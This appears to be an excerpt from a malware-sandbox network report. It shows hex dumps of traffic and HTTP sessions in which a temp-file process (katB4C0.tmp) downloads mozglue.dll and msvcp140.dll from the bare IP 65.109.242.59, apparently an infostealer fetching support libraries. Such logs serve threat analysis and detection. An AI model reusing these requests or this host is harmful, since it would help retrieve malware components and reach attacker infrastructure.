                                                                      2024-05-26 08:29:23 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                      Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                      2024-05-26 08:29:23 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                      Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                      2024-05-26 08:29:23 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                      Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                      2024-05-26 08:29:23 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                      Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                      2024-05-26 08:29:23 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                      Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                      2024-05-26 08:29:23 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                      Data Ascii: 0<48%8A)$(


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.44978265.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:24 UTC173OUTGET /mozglue.dll HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:24 UTC246INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:24 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 608080
                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                      Connection: close
                                                                      ETag: "6315a9f4-94750"
                                                                      Accept-Ranges: bytes
                                                                      2024-05-26 08:29:24 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                      2024-05-26 08:29:24 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                      Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                      Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                      Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                      Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                      Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                      Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                      Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                      2024-05-26 08:29:25 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                      Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.44978365.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:26 UTC174OUTGET /msvcp140.dll HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:26 UTC246INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:26 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 450024
                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                      Connection: close
                                                                      ETag: "6315a9f4-6dde8"
                                                                      Accept-Ranges: bytes
                                                                      2024-05-26 08:29:26 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                      2024-05-26 08:29:26 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                      Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                      2024-05-26 08:29:27 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                      Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                      2024-05-26 08:29:27 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                      Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
